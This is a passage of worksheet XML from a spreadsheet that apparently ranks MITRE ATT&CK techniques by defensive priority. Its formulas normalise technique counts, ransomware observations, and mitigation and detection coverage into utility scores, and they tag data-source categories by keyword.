        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I525" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J525" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K525" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L525" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M525" s="37">
        <v>4.019E-3</v>
      </c>
      <c r="N525" s="56">
        <v>0</v>
      </c>
      <c r="O525" s="56">
        <v>0</v>
      </c>
      <c r="P525" s="56">
        <v>0</v>
      </c>
      <c r="Q525" s="56">
        <v>0</v>
      </c>
      <c r="R525" s="57"/>
      <c r="S525" s="57">
        <v>0</v>
      </c>
      <c r="T525" s="57"/>
      <c r="U525" s="57">
        <v>0</v>
      </c>
      <c r="V525" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W525" s="37">
        <v>0</v>
      </c>
      <c r="X525" s="37">
        <v>0</v>
      </c>
      <c r="Y525" s="37">
        <v>0</v>
      </c>
      <c r="Z525" s="37">
        <v>0</v>
      </c>
      <c r="AA525" s="37">
        <v>0</v>
      </c>
      <c r="AB525" s="37">
        <v>0</v>
      </c>
      <c r="AC525" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD525" s="50" t="s">
        <v>1793</v>
      </c>
      <c r="AE525" s="37" t="str" cm="1">
        <f t="array" ref="AE525">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD525)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF525" s="37">
        <v>521</v>
      </c>
      <c r="AG525" s="37" t="str" cm="1">
        <f t="array" ref="AG525">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD525)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH525" s="37">
        <v>521</v>
      </c>
      <c r="AI525" s="37" t="str" cm="1">
        <f t="array" ref="AI525">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD525)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ525" s="37">
        <v>521</v>
      </c>
      <c r="AK525" s="37" t="str" cm="1">
        <f t="array" ref="AK525">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD525)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL525" s="37">
        <v>521</v>
      </c>
      <c r="AM525" s="37" t="str" cm="1">
        <f t="array" ref="AM525">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD525)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN525" s="37">
        <v>0</v>
      </c>
      <c r="AO525" s="37">
        <v>1</v>
      </c>
      <c r="AP525" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ525" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>37.543205000000007</v>
      </c>
      <c r="AR525" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS525" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT525" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU52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0.91769535714285722</v>
      </c>
    </row>
    <row r="526" spans="1:47" ht="34">
      <c r="A526" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B526" s="37">
        <f t="shared" si="8"/>
        <v>104.45</v>
      </c>
      <c r="C526" s="37" t="s">
        <v>1813</v>
      </c>
      <c r="D526" s="50" t="s">
        <v>1812</v>
      </c>
      <c r="E526" s="37" t="s">
        <v>1795</v>
      </c>
      <c r="F526" s="37">
        <v>0</v>
      </c>
      <c r="G526" s="37">
        <v>1</v>
      </c>
      <c r="H526" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I526" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J526" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K526" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L526" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M526" s="37">
        <v>0</v>
      </c>
      <c r="N526" s="56">
        <v>0</v>
      </c>
      <c r="O526" s="56">
        <v>0</v>
      </c>
      <c r="P526" s="56">
        <v>0</v>
      </c>
      <c r="Q526" s="56">
        <v>0</v>
      </c>
      <c r="R526" s="57"/>
      <c r="S526" s="57">
        <v>0</v>
      </c>
      <c r="T526" s="57"/>
      <c r="U526" s="57">
        <v>0</v>
      </c>
      <c r="V526" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W526" s="37">
        <v>0</v>
      </c>
      <c r="X526" s="37">
        <v>0</v>
      </c>
      <c r="Y526" s="37">
        <v>0</v>
      </c>
      <c r="Z526" s="37">
        <v>0</v>
      </c>
      <c r="AA526" s="37">
        <v>0</v>
      </c>
      <c r="AB526" s="37">
        <v>0</v>
      </c>
      <c r="AC526" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD526" s="50" t="s">
        <v>1796</v>
      </c>
      <c r="AE526" s="37" t="str" cm="1">
        <f t="array" ref="AE526">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD526)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF526" s="37">
        <v>522</v>
      </c>
      <c r="AG526" s="37" t="str" cm="1">
        <f t="array" ref="AG526">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD526)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH526" s="37">
        <v>522</v>
      </c>
      <c r="AI526" s="37" t="str" cm="1">
        <f t="array" ref="AI526">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD526)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ526" s="37">
        <v>522</v>
      </c>
      <c r="AK526" s="37" t="str" cm="1">
        <f t="array" ref="AK526">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD526)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL526" s="37">
        <v>522</v>
      </c>
      <c r="AM526" s="37" t="str" cm="1">
        <f t="array" ref="AM526">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD526)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN526" s="37">
        <v>0</v>
      </c>
      <c r="AO526" s="37">
        <v>0</v>
      </c>
      <c r="AP526" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ526" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>34.81666666666667</v>
      </c>
      <c r="AR526" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS526" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT526" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU52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27" spans="1:47" ht="17">
      <c r="A527" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B527" s="37">
        <f t="shared" si="8"/>
        <v>104.65</v>
      </c>
      <c r="C527" s="37" t="s">
        <v>1814</v>
      </c>
      <c r="D527" s="50" t="s">
        <v>1812</v>
      </c>
      <c r="E527" s="37" t="s">
        <v>1798</v>
      </c>
      <c r="F527" s="37">
        <v>0</v>
      </c>
      <c r="G527" s="37">
        <v>1</v>
      </c>
      <c r="H527" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I527" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J527" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K527" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L527" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M527" s="37">
        <v>0</v>
      </c>
      <c r="N527" s="56">
        <v>0</v>
      </c>
      <c r="O527" s="56">
        <v>0</v>
      </c>
      <c r="P527" s="56">
        <v>0</v>
      </c>
      <c r="Q527" s="56">
        <v>0</v>
      </c>
      <c r="R527" s="57"/>
      <c r="S527" s="57">
        <v>0</v>
      </c>
      <c r="T527" s="57"/>
      <c r="U527" s="57">
        <v>0</v>
      </c>
      <c r="V527" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W527" s="37">
        <v>0</v>
      </c>
      <c r="X527" s="37">
        <v>0</v>
      </c>
      <c r="Y527" s="37">
        <v>0</v>
      </c>
      <c r="Z527" s="37">
        <v>0</v>
      </c>
      <c r="AA527" s="37">
        <v>0</v>
      </c>
      <c r="AB527" s="37">
        <v>0</v>
      </c>
      <c r="AC527" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD527" s="50" t="s">
        <v>1815</v>
      </c>
      <c r="AE527" s="37" t="str" cm="1">
        <f t="array" ref="AE527">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD527)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF527" s="37">
        <v>523</v>
      </c>
      <c r="AG527" s="37" t="str" cm="1">
        <f t="array" ref="AG527">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD527)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH527" s="37">
        <v>523</v>
      </c>
      <c r="AI527" s="37" t="str" cm="1">
        <f t="array" ref="AI527">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD527)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ527" s="37">
        <v>523</v>
      </c>
      <c r="AK527" s="37" t="str" cm="1">
        <f t="array" ref="AK527">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD527)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL527" s="37">
        <v>523</v>
      </c>
      <c r="AM527" s="37" t="str" cm="1">
        <f t="array" ref="AM527">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD527)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN527" s="37">
        <v>0</v>
      </c>
      <c r="AO527" s="37">
        <v>0</v>
      </c>
      <c r="AP527" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ527" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>34.883333333333333</v>
      </c>
      <c r="AR527" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS527" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT527" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU52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28" spans="1:47" ht="34">
      <c r="A528" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B528" s="37">
        <f t="shared" si="8"/>
        <v>104.85000000000001</v>
      </c>
      <c r="C528" s="37" t="s">
        <v>1816</v>
      </c>
      <c r="D528" s="50" t="s">
        <v>1812</v>
      </c>
      <c r="E528" s="37" t="s">
        <v>1800</v>
      </c>
      <c r="F528" s="37">
        <v>0</v>
      </c>
      <c r="G528" s="37">
        <v>1</v>
      </c>
      <c r="H528" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I528" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J528" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K528" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L528" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M528" s="37">
        <v>0</v>
      </c>
      <c r="N528" s="56">
        <v>0</v>
      </c>
      <c r="O528" s="56">
        <v>0</v>
      </c>
      <c r="P528" s="56">
        <v>0</v>
      </c>
      <c r="Q528" s="56">
        <v>0</v>
      </c>
      <c r="R528" s="57"/>
      <c r="S528" s="57">
        <v>0</v>
      </c>
      <c r="T528" s="57"/>
      <c r="U528" s="57">
        <v>0</v>
      </c>
      <c r="V528" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W528" s="37">
        <v>0</v>
      </c>
      <c r="X528" s="37">
        <v>0</v>
      </c>
      <c r="Y528" s="37">
        <v>0</v>
      </c>
      <c r="Z528" s="37">
        <v>0</v>
      </c>
      <c r="AA528" s="37">
        <v>0</v>
      </c>
      <c r="AB528" s="37">
        <v>0</v>
      </c>
      <c r="AC528" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD528" s="50" t="s">
        <v>1801</v>
      </c>
      <c r="AE528" s="37" t="str" cm="1">
        <f t="array" ref="AE528">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD528)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF528" s="37">
        <v>524</v>
      </c>
      <c r="AG528" s="37" t="str" cm="1">
        <f t="array" ref="AG528">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD528)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH528" s="37">
        <v>524</v>
      </c>
      <c r="AI528" s="37" t="str" cm="1">
        <f t="array" ref="AI528">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD528)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ528" s="37">
        <v>524</v>
      </c>
      <c r="AK528" s="37" t="str" cm="1">
        <f t="array" ref="AK528">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD528)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL528" s="37">
        <v>524</v>
      </c>
      <c r="AM528" s="37" t="str" cm="1">
        <f t="array" ref="AM528">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD528)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN528" s="37">
        <v>0</v>
      </c>
      <c r="AO528" s="37">
        <v>0</v>
      </c>
      <c r="AP528" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ528" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>34.950000000000003</v>
      </c>
      <c r="AR528" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS528" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT528" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU52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29" spans="1:47" ht="34">
      <c r="A529" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B529" s="37">
        <f t="shared" si="8"/>
        <v>105.05000000000001</v>
      </c>
      <c r="C529" s="37" t="s">
        <v>1817</v>
      </c>
      <c r="D529" s="50" t="s">
        <v>1812</v>
      </c>
      <c r="E529" s="37" t="s">
        <v>1803</v>
      </c>
      <c r="F529" s="37">
        <v>0</v>
      </c>
      <c r="G529" s="37">
        <v>1</v>
      </c>
      <c r="H529" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I529" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J529" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K529" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L529" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M529" s="37">
        <v>0</v>
      </c>
      <c r="N529" s="56">
        <v>0</v>
      </c>
      <c r="O529" s="56">
        <v>0</v>
      </c>
      <c r="P529" s="56">
        <v>0</v>
      </c>
      <c r="Q529" s="56">
        <v>0</v>
      </c>
      <c r="R529" s="57"/>
      <c r="S529" s="57">
        <v>0</v>
      </c>
      <c r="T529" s="57"/>
      <c r="U529" s="57">
        <v>0</v>
      </c>
      <c r="V529" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W529" s="37">
        <v>0</v>
      </c>
      <c r="X529" s="37">
        <v>0</v>
      </c>
      <c r="Y529" s="37">
        <v>0</v>
      </c>
      <c r="Z529" s="37">
        <v>0</v>
      </c>
      <c r="AA529" s="37">
        <v>0</v>
      </c>
      <c r="AB529" s="37">
        <v>0</v>
      </c>
      <c r="AC529" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD529" s="50" t="s">
        <v>1801</v>
      </c>
      <c r="AE529" s="37" t="str" cm="1">
        <f t="array" ref="AE529">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD529)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF529" s="37">
        <v>525</v>
      </c>
      <c r="AG529" s="37" t="str" cm="1">
        <f t="array" ref="AG529">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD529)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH529" s="37">
        <v>525</v>
      </c>
      <c r="AI529" s="37" t="str" cm="1">
        <f t="array" ref="AI529">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD529)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ529" s="37">
        <v>525</v>
      </c>
      <c r="AK529" s="37" t="str" cm="1">
        <f t="array" ref="AK529">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD529)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL529" s="37">
        <v>525</v>
      </c>
      <c r="AM529" s="37" t="str" cm="1">
        <f t="array" ref="AM529">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD529)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN529" s="37">
        <v>0</v>
      </c>
      <c r="AO529" s="37">
        <v>0</v>
      </c>
      <c r="AP529" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ529" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>35.016666666666673</v>
      </c>
      <c r="AR529" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS529" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT529" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU52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30" spans="1:47" ht="17">
      <c r="A530" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B530" s="37">
        <f t="shared" si="8"/>
        <v>105.25</v>
      </c>
      <c r="C530" s="37" t="s">
        <v>1818</v>
      </c>
      <c r="D530" s="50" t="s">
        <v>1812</v>
      </c>
      <c r="E530" s="37" t="s">
        <v>1805</v>
      </c>
      <c r="F530" s="37">
        <v>0</v>
      </c>
      <c r="G530" s="37">
        <v>1</v>
      </c>
      <c r="H530" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I530" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J530" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K530" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L530" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M530" s="37">
        <v>0</v>
      </c>
      <c r="N530" s="56">
        <v>0</v>
      </c>
      <c r="O530" s="56">
        <v>0</v>
      </c>
      <c r="P530" s="56">
        <v>0</v>
      </c>
      <c r="Q530" s="56">
        <v>0</v>
      </c>
      <c r="R530" s="57"/>
      <c r="S530" s="57">
        <v>0</v>
      </c>
      <c r="T530" s="57"/>
      <c r="U530" s="57">
        <v>0</v>
      </c>
      <c r="V530" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
